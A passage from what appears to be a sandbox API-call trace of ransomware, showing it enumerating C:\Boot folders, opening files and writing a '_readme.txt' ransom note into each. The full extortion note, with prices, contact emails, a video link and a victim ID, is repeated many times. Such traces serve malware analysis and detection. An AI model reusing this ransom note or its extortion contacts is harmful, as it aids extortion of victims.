$980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.588] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.588] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.589] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.589] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.589] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.589] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0201.589] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0201.589] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.589] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.589] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.590] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.594] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0201.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.594] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.594] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.594] PathFindFileNameW (pszPath="") returned="" [0201.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.594] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.595] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.595] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.595] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.595] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0201.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.595] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0201.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.595] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.596] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.596] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.596] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, 